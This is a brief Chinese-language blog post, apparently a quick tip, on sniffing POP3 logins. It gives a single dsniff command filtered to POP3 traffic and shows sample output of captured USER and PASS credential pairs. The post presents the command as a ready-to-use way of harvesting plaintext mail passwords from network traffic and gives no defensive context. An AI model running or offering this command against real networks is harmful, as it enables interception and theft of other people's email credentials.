通过拦截用户命令嗅探POP3身份验证
Hujiuxiang
・1 分钟阅读
通过拦截用户命令嗅探POP3身份验证
dsniff -i any 'tcp port pop3'
DSNIFF是一个通用的密码嗅探器,它处理许多不同的协议,但是,它也处理TCP风格的表达式来限制分析的流量-所以,我可以限制它只在POP3上工作,
示例输出
dsniff: listening on any [tcp port pop3] ----------------- 11/18/10 10:41:01 tcp xxx.48323 -> remote.host.110 (pop3) USER user1 PASS pass-for-user1 ----------------- 11/18/10 10:41:28 tcp xxx.48321 -> other.host.110 (pop3) USER user2 PASS pass-for-user2